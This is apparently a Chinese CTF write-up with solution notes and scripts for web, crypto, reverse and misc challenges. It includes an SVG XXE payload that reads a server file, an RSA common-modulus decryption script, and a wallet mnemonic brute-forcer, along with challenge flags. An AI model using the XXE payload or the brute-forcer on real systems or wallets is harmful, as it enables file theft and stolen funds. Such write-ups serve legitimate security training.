WEB

upload

image-20251108133334147

image-20251108133325095

image-20251108133311365

EzSerialize

链子一眼穿

image-20251108133243674

看start.sh

image-20251108133604752

image-20251108134250780

image-20251108134235337

UploadKing

上传 SVG 打 XXE:SVG 本质是 XML,服务端解析上传的 SVG 时如果会解析外部实体,file:///flag 的内容就会被带进 <text> 里。

<?xml version="1.0" encoding="UTF-8"?>
<!-- The DOCTYPE below declares an external entity named "file" whose system
     identifier is file:///flag. The reference to that entity inside <text> is
     replaced by the file's content only when the parser resolves external
     entities. Parsing uploaded SVG with DTD and external-entity processing
     switched off keeps the file content out of the rendered output. -->
<!DOCTYPE note [ <!ENTITY file SYSTEM "file:///flag" > ]>
<svg height="100" width="1000">
<text x="10" y="20">&file;</text>
</svg>

image-20251108180829911

CRYPTO

RSA_Common_Attack

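共模攻击:同一明文在同一个模数 n 下分别用 e1、e2 加密,且 gcd(e1, e2) = 1 时,用扩展欧几里得求出 s1、s2 使 e1·s1 + e2·s2 = 1,则 c1^s1 · c2^s2 ≡ m (mod n)。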

image-20251108144943567

from gmpy2 import *
from Crypto.Util.number import *

# RSA common-modulus setting: two ciphertexts (c1, c2) produced under one
# modulus n with two different public exponents (e1, e2).  The recovery below
# works when both ciphertexts encrypt the same message; sharing a modulus
# between key pairs is what makes it possible.
c1 = 902947871638340144585350496607905036788917988784297938051712515029419473301205843372041904115813361402310512640716508455953201343091183980022416880886523265909139556951175072940441586166669057233430247014907124872576782948489940428513680356381769358116956570193102584168134758031000460513472898624075765670452482015562555449322262139576088011030490086784087285869959810062075648470122232452663599195404333292792928816934802064740144937473749408450501803510475933273448208685792400696632919950948832464784621694657179199125876564156360048730797653060931844444935302553732964065897065735427838601696506594726842758656

c2 = 7024079443689213821451191616762957236018704240049119768827190246286227366906772824421534943039282921384333899446122799252327963055365970065258371710141470872948613397123358914507497871585713222863470875497667604127210508840915183968145267083193773724382523920130152399270957943228022350279379887455019966651166356404967621474933206809521046480962602160962854745553005978607776790079518796651707745342923714121497001171456582586327982922261473553814594384196824815090185841526000247291514943042643385984600122463395695871306301585799490389353720773152762256126676456786420058282912965520064317739998211921049808590504

n = 12184620342604321526236147921176689871260702807639258752158298414126076615130224253248632789995209263378074151299166903216279276546198828352880417707078853010887759267119069971739321905295081485027018480973993441393590030075971419165113599211569178425331802782763120185350392723844716582476742357944510728860535408085789317844446495987195735585533277358245562877243064161565448407188900804528695784565011073374273835326807616704068806996983861885772305191259029021518998160545972629938341341148477795894816345752396040127286263780418335699743896454197151019898505844519753453115300227481242993291336748858733029540609

e1, e2 = 65537, 10001

# Extended Euclid: bezout_g == e1 * coef1 + e2 * coef2.
bezout_g, coef1, coef2 = gcdext(e1, e2)

# c1**coef1 * c2**coef2 == m**(e1*coef1 + e2*coef2) == m**bezout_g (mod n).
# One of the two coefficients is negative, so the matching pow() goes through
# the modular inverse of that ciphertext.
combined = pow(c1, coef1, n) * pow(c2, coef2, n) % n

# iroot returns (root, is_exact); only the root is used.  With coprime
# exponents bezout_g is 1 and the root is the combined value itself.
root, _is_exact = iroot(combined, bezout_g)
m = long_to_bytes(root)

print(m)
# flag = NSSCTF{d64dba66-b608-4255-b888-0b0f25c2f90e}

image-20251108145339367

ez_stream

逆向手一眼rc4

image-20251108145620420

image-20251108145616732

image-20251108145724849

数据安全

dsEnData

import base64

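def encode(D, K='a1a60171273e74a6'):
    """Base64-decode *D* and XOR every byte with the repeating key *K*.

    Byte ``i`` of the decoded input is XORed with the character at key index
    ``(i + 1) & 15``, so the key is used from its second character and wraps
    every 16 bytes.  XOR is its own inverse: the same routine removes the mask
    it applies.  A fixed repeating XOR key is obfuscation only; anyone holding
    the key (or enough known plaintext) recovers the data.

    :param D: base64 text to decode, as ``bytes`` or ASCII ``str``
    :param K: key string; indices 0-15 are used
    :return: the unmasked bytes
    """
    # Decode the argument itself rather than a module-level variable, so the
    # function gives the right answer for any caller.
    raw = base64.b64decode(D)
    # bytes(generator) builds the result in one pass instead of repeated
    # concatenation and hex round-trips.
    return bytes(value ^ ord(K[(i + 1) & 15]) for i, value in enumerate(raw))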

import pandas as pd
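# Decode the five obfuscated text columns of the challenge CSV in place, show
# the frame, and write the decoded copy next to the input file.
df = pd.read_csv(r"C:\Users\55397\Downloads\dsEnData的附件\tempdir\DS附件\dsEnData的附件\encoded_data.csv")
# Every row of the frame is processed (no fixed row count), one column at a
# time; the cells are independent, so the processing order does not matter.
for column in ("username", "name", "phone", "email", "address"):
    for i in df.index:
        # `data` stays a module-level name so helpers that read it see the
        # current cell.
        data = df[column][i]
        df.loc[i, column] = encode(data.encode()).decode()
print(df)
df.to_csv(r"C:\Users\55397\Downloads\dsEnData的附件\tempdir\DS附件\dsEnData的附件\re.csv", index=False)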

AI

ez_AI_inject

image-20251108181412108

image-20251108181952514

MISC

什么密码

先修复伪加密

img

得到一张图片

img

Rsb隐写得到密文

Winhex打开文件尾部得到base64的换表

img

解密得到

img

RecoverWallet

助记词爆破,地址转换

利用之前的脚本稍作修改(感谢杨雪老师的取证课)

from mnemonic import Mnemonic
from tronpy import Tron
from tronpy.keys import PrivateKey
from bip32 import BIP32
import eth_keys


# The eleven known words of the phrase, in their known order.
partial_mnemonic = " ".join((
    "ankle", "assume", "estate", "permit", "eye", "fancy",
    "spring", "demand", "dial", "awkward", "hole",
))
# Hex fragment that the derived address has to contain.
target_address = "700f80"
mnemo = Mnemonic("english")
# English word list of the mnemonic library; every entry is a candidate.
wordlist = mnemo.wordlist


def generate_eth_address(mnemonic_words):
    """
    Derive the Ethereum address that belongs to a mnemonic phrase.

    :param mnemonic_words: mnemonic phrase, words separated by spaces
    :return: checksum-format address of the key at m/44'/60'/0'/0/0
    """
    # Mnemonic -> seed -> BIP32 tree; the path's 60' component is the one the
    # script uses for Ethereum.
    hd_root = BIP32.from_seed(mnemo.to_seed(mnemonic_words))
    key_bytes = hd_root.get_privkey_from_path("m/44'/60'/0'/0/0")

    # eth_keys turns the raw private key into its public key and address.
    return eth_keys.keys.PrivateKey(key_bytes).public_key.to_checksum_address()


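# Walk the word list and try each word in the fifth position, the only one
# that is missing; the order of the known words is fixed.
known_words = partial_mnemonic.split()
for word in wordlist:
    # Same phrase as slicing the string after the fourth word, without the
    # hard-coded character offset.
    full_mnemonic = " ".join(known_words[:4] + [word] + known_words[4:])
    # Candidates that fail the mnemonic checksum cannot be the phrase.
    if not mnemo.check(full_mnemonic):
        continue
    try:
        eth_address = generate_eth_address(full_mnemonic)
    except ValueError as e:
        print(f"错误: {e}")
        continue
    # The address comes back in mixed-case checksum form, so the fragment is
    # compared case-insensitively; a lower-case fragment would otherwise miss
    # an address whose checksum capitalises one of its letters.
    if target_address.lower() in eth_address.lower():
        print(f"目标地址{target_address}关联的助记词是: {full_mnemonic}")
        print(f"生成的以太坊地址是: {eth_address}")
        break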

单词的顺序是已知的,缺的是第五个单词,只需要爆破这一位。

询问本地 AI 得知,以太坊(ETH)在派生路径里的币种编号是 60,即脚本里用的 m/44'/60'/0'/0/0。

img

得到结果

img

REVERSE

DontDebugMe

绕过反调试后可以看到加密逻辑:先加上 685h,再和 EE20h 异或;解密时反过来,先异或再减去 685h。

# Twenty encoded constants, each of which fits in 16 bits.
enc = [
    0xA9E9, 0xA7F8, 0xA2F9, 0x0D620, 0xD69A,
    0xD9C8, 0xD399, 0x85CB, 0xD29B, 0xD5C7,
    0x8496, 0xD4C9, 0xD89A, 0xD7CA, 0xD59C,
    0x85C8, 0xD597, 0x859E, 0xD49C, 0x6DCA,
]

# Undo the transform back to front: XOR with 0xee20 first, then subtract
# 0x685.  The decoded values replace the encoded ones in `enc`.
enc = [(word ^ 0xee20) - 0x685 for word in enc]
decode = [hex(word) for word in enc]

print(decode)

# The decoded words written out as ASCII, high byte first.  The two characters
# of every pair are swapped when the string is printed.
a = 'ADCSFT1{251c74ef665bd14d053e57ec52e947}e'
swapped = ''.join(a[pos + 1] + a[pos] for pos in range(0, len(a) - 1, 2))
print(swapped, end='')

信创安全

红头文件之谜

打开先看.wps,一眼少个zip头

image-20251108183032708

image-20251108183227479

image-20251108183325222

image-20251108183431988

得到zip密码解压的流量包

image-20251108183932191

image-20251108184223797